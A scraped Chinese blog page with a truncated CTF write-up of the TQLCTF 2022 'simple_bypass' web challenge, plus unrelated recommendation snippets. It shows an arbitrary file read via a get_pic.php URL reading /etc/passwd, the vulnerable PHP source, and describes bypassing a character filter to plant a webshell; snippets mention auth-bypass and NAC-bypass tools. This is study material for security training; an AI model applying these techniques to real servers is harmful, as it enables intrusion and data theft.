[TQLCTF 2022]simple_bypass

最新推荐文章于 2024-01-26 11:07:07 发布
原创 最新推荐文章于 2024-01-26 11:07:07 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #Web #php

本文档详细介绍了[TQLCTF2022]中的一道题目,涉及web应用的安全问题。通过分析get_pic.php源码,揭示了任意文件读取漏洞,可以读取/etc/passwd等敏感文件。同时,通过研究index.php和template.html,找到了可以注入webshell的点,通过构造不包含数字和字母的punctuation参数,成功绕过过滤并上传webshell。最终利用这个漏洞查看了根目录和flag文件。

[TQLCTF 2022]simple_bypass

文章目录

simple_bypass

首先注册,然后才能登录,一个很粗糙的界面

注意好康的那里,查看元素,是一串base64编码

在这里插入图片描述

base解码转图片,证明了这一点

在这里插入图片描述

任意文件读取

然后就可以进根据这个进行任意文件下载,读取/etc/passwd

http://1.14.71.254:28358/get_pic.php?image=/etc/passwd

在这里插入图片描述

查看get_pic.php

http://1.14.71.254:28358/get_pic.php?image=get_pic.php

进行base64解码

<?php error_reporting(0);
 $image = (string)$_GET['image']; 
echo '<div class="img"> <img src="data:image/png;base64,' . base64_encode(file_get_contents($image)) . '" /> </div>'; 
?>

读取index.php(下面是把前端代码删除之后的结果)

http://1.14.71.254:28358/get_pic.php?image=index.php

(下面是把前端代码删除之后的结果)

<?php
error_reporting(0);
if(isset($_POST['user']) && isset($_POST['pass'])){
   
   
	$hash_user = md5($_POST['user']);
	$hash_pass = 'zsf'.md5($_POST['pass']);
	if(isset($_POST['punctuation'])){
   
   
		//filter
		if (strlen($_POST['user']) > 6){
   
   
			echo("<script>alert('Username is too long!');</script>");
		}
		elseif(strlen($_POST['website']) > 25
最低0.47元/天 解锁文章
simple_bypass
m0_60716947的博客
10-27 947
很像无字母数字rce,先看看后面的,获取了template.html的页面内容,并进行了一些替换,我们再去看看template.html的代码。审计代码(还好简单,不然我这个菜鸡就寄了),几个post传参,并对长度进行了限制,然后正则匹配过滤。使用半个注释符进行闭合,然后构造恶意代码,再在最后使用半个多行注释符把后面注释掉就可以了。开靶机,发现一个登录与注册的页面,尝试sql注入,无果,随便注册一个登录上去。主要是这里,但是index.php对他的长度进行了限制,所以不能在这里构造。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
TQLCTF2022 WriteUP(自己做+收集整理+持续更新)
Laffrey的专栏
02-22 1832
[Misc]1.签到 关注微信公众号后,获得1个链接,在源码中找到flag。 [Misc]2. Wizard 访问链接,打开web页面显示的内容如下: SHA256('TQLCTF' + ?) starts with 58011 Please input the string: 于是,猜测这题需要通过命令行(CLI)界面进行交互。 题目是对字符串 'TQLCTF' + ? 进行SHA256哈希计算,得到的哈希值以 58011 开头。 显然,我们需要根据server端发来的回显信息,提取到哈希值(58011
精选资源
大华的java笔试题-dahua_dvr_auth_bypass:大华CCTVDVR认证绕过Metasploit扫描模块
06-20
大华的java笔试题dahua_dvr_auth_bypass 大华CCTV DVR认证绕过Metasploit扫描模块 这是一个 Metasploit 模块,用于扫描和利用大华和大华更名的 CCTV DVR。 安装: git 克隆 将 dahua_dvr_auth_bypass.rb 文件复制到 ...
精选资源
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
精选资源
nac_bypass:脚本收集以绕过网络访问控制(NAC,802.1x)
01-31
标题中的“nac_bypass”指的是一个专门针对网络访问控制(NAC,Network Access Control)进行规避的技术集合,尤其关注802.1x标准。802.1x是一种基于端口的网络访问控制协议,常用于企业环境中,通过认证用户设备的...
2022 TQLCTF pwn easyvm
yongbaoii的博客
02-22 721
题目很有意思,肝了不少时间。
[TQLCTF_2022]web复现
qq_46263951的博客
03-23 843
注册登陆,查看图片 使用伪协议我们可以读取到/etc/passwd 想要读取get_pic.php和index.php但是不知道文件路径,所以使用php伪协议 /get_pic.php?image=php://filter/convert.base64-encode/resource=get_pic.php | index.php get_pic.php源码 <?php error_reporting(0); $image = (string)$_GET['image']; ech.
TQLCTF2022真题
02-22
TQLCTF2022真题
d3ctf_easyQuantum
03-13
easyQuantum cap.pcapng用Wireshark打开,清晰可见的TCP的三次握手和四次挥手: 因此需要仔细分析中间的数据传输过程。 注意到某些数据包内有“ numpy”等字符串: 于是想到可能是某种兼容Python的序列化方法。 又注意到有固定的头部数据: 而pickle序列化时也有固定的头部数据(协议版本4.0): 于是尝试利用pickle进行反序列化。示例如下: import pyshark import pickle cap = pyshark . FileCapture ( 'cap.pcapng' ) test_pack = cap [ 3 ] data = test_pack . data . data . binary_value deserialized = pickle . loads ( data ) print ( deserialized ) 得
[TQLCTF2022] Simple PHP WP
A10ng_的博客
02-21 838
这个题很有意思,写shell的姿势比较好玩,我在之前搞渗透的时候同样遇到类似手法, 所以就记录一下。 打开题目是一个登录口,个人习惯,先测一下注入,发现是不存在的,然后注册一个号上去康康,这一康不得了,发现了有个功能点有任意文件读取,他是去加载本地文件的一个功能。并且文件的路径和文件名可控,在测试了/etc/passwd,成功读取了。 然后在fuzz了一下flag文件名没有结果后,继续尝试下一步,把所有的源码读出来,我首先读了这个功能点的源码。发现是用的file_get_contents函数,所以并不存在
[TQLCTF2022]NETWORK TOOLS复现
cosmoslin的博客
03-04 1899
考点 DNS缓存污染 FTP SSRF 原理 通过在DNS资源记录中插⼊控制字符,从⽽影响DNS的解析结果,或是插⼊不符合域名规范的特殊字符,最终实现DNS缓存污染、SQL 注⼊、XSS等效果。 DNS 域名系统(Domain Name System,DNS),主要作用是将域名转换为ip地址。它是由一个分层的DNS服务器实现的分布式数据库,也是一个使得主机能够查询分布式数据库的应用层协议。DNS服务器通常是一个运行BIND(Berkeley Internet Name Domain)软件的UNI
TQLCTF-Simple PHP
qq_53460654的博客
02-21 810
注册登录,抓包发现有个地方有任意文件读取 读取index.php 关键代码 if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){ if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){ $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0- 9>\?]/","",$_POST['pun
文件包含漏洞与文件包含Bypass漏洞基础
bluemoon_0的博客
03-16 662
文件包含漏洞与文件包含Bypass漏洞基础
tqlctf reverse wp: Tale of the Arrow & quantum
qq_41866334的博客
02-21 554
Tale of the Arrow 题目给了源码, 把输入转成二进制串, 每一位都会打出三个数字, 数字正确和错误可能各一半, 但是其中有一个一定是正确的. 因此利用flag是可见字符最高位必为0 以及 一组三个有两个错误时剩下那个一定正确 两个条件可以直接还原出flag with open('output.txt','r') as f: con = f.read().splitlines()[2:] con =[ int(x) for x in con] torf = [0] * len(c
bypass命令执行-简单梳理多种方式文件下载_命令执行
qq_36334672的博客
01-26 1193
在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:\Windows\System32\Printing_Admin_Scripts\ en/zh-US,因为是vbs,可以直接调用。将生成的恶意dll文件放到修改成xwizards.dll,放到同目录下,这个有点类似于DLL劫持,1.txt为固定格式不用管他。可以将bitadmin里的签名删掉,可能有的杀软拦截的不是行为,而是恶意文件的特征。这里的不是我使用过的,根据看的网上文章进行了一个简单的收集和归纳。
TQLCTF2022 Misc WriteUp
mumuzi的博客
02-21 6879
优快云什么玩意儿???
DL_COMBINE_NINE_PATH : for i in logic_cpri_combine_nine_int to logic_cpri_combine_nine_int generate dl_comp_bypass_mux_modem_num_s(i) <= dl_comp_bypass_mux_modem_num(9); dl_comp_bypass_mux_modem_num_s(9) <= dl_comp_bypass_mux_modem_num(i); dl_comp_bypass_mux_frm_strb_s(i) <= dl_comp_bypass_mux_frm_strb(9); dl_comp_bypass_mux_frm_strb_s(9) <= dl_comp_bypass_mux_frm_strb(i); dl_comp_bypass_mux_ce_bf_s(i) <= dl_comp_bypass_mux_ce_bf(9); dl_comp_bypass_mux_ce_bf_s(9) <= dl_comp_bypass_mux_ce_bf(i); dl_comp_bypass_mux_data_out_s(i) <= dl_comp_bypass_mux_data_out(9); dl_comp_bypass_mux_data_out_s(9) <= dl_comp_bypass_mux_data_out(i); end generate; DL_COMBINE_TEN_PATH : for j in logic_cpri_combine_ten_int to logic_cpri_combine_ten_int generate dl_comp_bypass_mux_modem_num_s(j) <= dl_comp_bypass_mux_modem_num(10); dl_comp_bypass_mux_modem_num_s(10) <= dl_comp_bypass_mux_modem_num(j); dl_comp_bypass_mux_frm_strb_s(j) <= dl_comp_bypass_mux_frm_strb(10); dl_comp_bypass_mux_frm_strb_s(10) <= dl_comp_bypass_mux_frm_strb(j); dl_comp_bypass_mux_ce_bf_s(j) <= dl_comp_bypass_mux_ce_bf(10); dl_comp_bypass_mux_ce_bf_s(10) <= dl_comp_bypass_mux_ce_bf(j); dl_comp_bypass_mux_data_out_s(j) <= dl_comp_bypass_mux_data_out(10); dl_comp_bypass_mux_data_out_s(10) <= dl_comp_bypass_mux_data_out(j); end generate; 其中I与J不会相等,怎么添加限制条件解决多驱动问题
最新发布
08-07
### 三级标题:VHDL中生成语句导致的多驱动冲突及解决方法 在VHDL设计中,使用`generate`语句可以实现结构的重复生成,例如在实现多通道数据处理或存储结构时非常高效。然而,若在`generate`语句内部对同一信号进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值